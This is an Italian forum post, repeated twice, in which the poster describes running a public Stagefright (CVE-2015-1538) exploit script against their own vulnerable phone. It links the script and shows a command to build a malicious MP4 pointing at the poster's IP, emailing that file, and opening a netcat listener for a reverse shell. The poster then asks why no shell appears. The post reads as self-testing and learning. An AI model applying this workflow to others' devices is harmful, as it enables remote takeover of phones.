Ciao a tutti,
dopo la scoperta da parte di Zimperium del noto Stagefright, ho cominciato ad informarmi sull'argomento in particolare su come proteggermi e sul funzionamento della libreria in questione.
Mi sono imbattuto in seguito nello script python scritto da uno degli Hacker di Zimperium.
https://github.com/jduck/cve-2015-1538-1/blob/master/Stagefright_CVE-2015-1538-1_Exploit.py
Ho provato ad eseguirlo e a risolvere i vari problemi... Per prima cosa ho rinominato lo script in mp4.py, in modo che diventasse ricorsivo. Ho poi usato python2.7 per far partire lo script (in quanto con la 3.x da problemi di codifica), dopo di che ho fatto partire lo script in questo modo:
A questo punto viene generato un file.mp4 che ho inviato tramite email al me stesso su un telefono vulnerabile a stagefright. Prima di aprire il file sul telefono ho aperto un listener sul mio pc per la shell di ritorno.
Quando apro il video sul telefono, sul pc non si apre la shell come dovrebbe...
Qualcuno di voi a fatto dei test?
dopo la scoperta da parte di Zimperium del noto Stagefright, ho cominciato ad informarmi sull'argomento in particolare su come proteggermi e sul funzionamento della libreria in questione.
Mi sono imbattuto in seguito nello script python scritto da uno degli Hacker di Zimperium.
https://github.com/jduck/cve-2015-1538-1/blob/master/Stagefright_CVE-2015-1538-1_Exploit.py
Ho provato ad eseguirlo e a risolvere i vari problemi... Per prima cosa ho rinominato lo script in mp4.py, in modo che diventasse ricorsivo. Ho poi usato python2.7 per far partire lo script (in quanto con la 3.x da problemi di codifica), dopo di che ho fatto partire lo script in questo modo:
Codice:
python2.7 -c [Mio IP] -p 4444
A questo punto viene generato un file.mp4 che ho inviato tramite email al me stesso su un telefono vulnerabile a stagefright. Prima di aprire il file sul telefono ho aperto un listener sul mio pc per la shell di ritorno.
Codice:
netcat -l -p 4444
Quando apro il video sul telefono, sul pc non si apre la shell come dovrebbe...
Qualcuno di voi a fatto dei test?